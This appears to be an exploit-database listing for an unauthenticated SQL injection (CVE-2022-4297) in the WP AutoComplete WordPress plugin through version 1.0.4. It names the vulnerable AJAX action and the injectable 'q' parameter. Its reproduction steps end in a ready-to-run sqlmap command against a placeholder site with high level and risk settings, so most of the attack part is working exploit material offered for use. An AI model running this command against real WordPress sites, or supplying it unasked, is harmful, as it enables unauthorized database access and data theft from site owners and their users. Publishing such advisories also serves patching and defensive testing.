Share
## https://sploitus.com/exploit?id=PACKETSTORM:173293
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi  
# Date: 30/06/2023  
# Exploit Author: Matin nouriyan (matitanium)  
# Version: <= 1.0.4  
# CVE: CVE-2022-4297  
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/  
# Tested on: Kali linux  
  
---------------------------------------  
  
  
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise   
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,  
leading to an unauthenticated SQL injection  
  
--------------------------------------  
  
How to Reproduce this Vulnerability:  
  
1. Install WP AutoComplete <= 1.0.4   
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests  
3. Find requests belong to WP AutoComplete like step 5  
4. Start sqlmap and exploit   
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q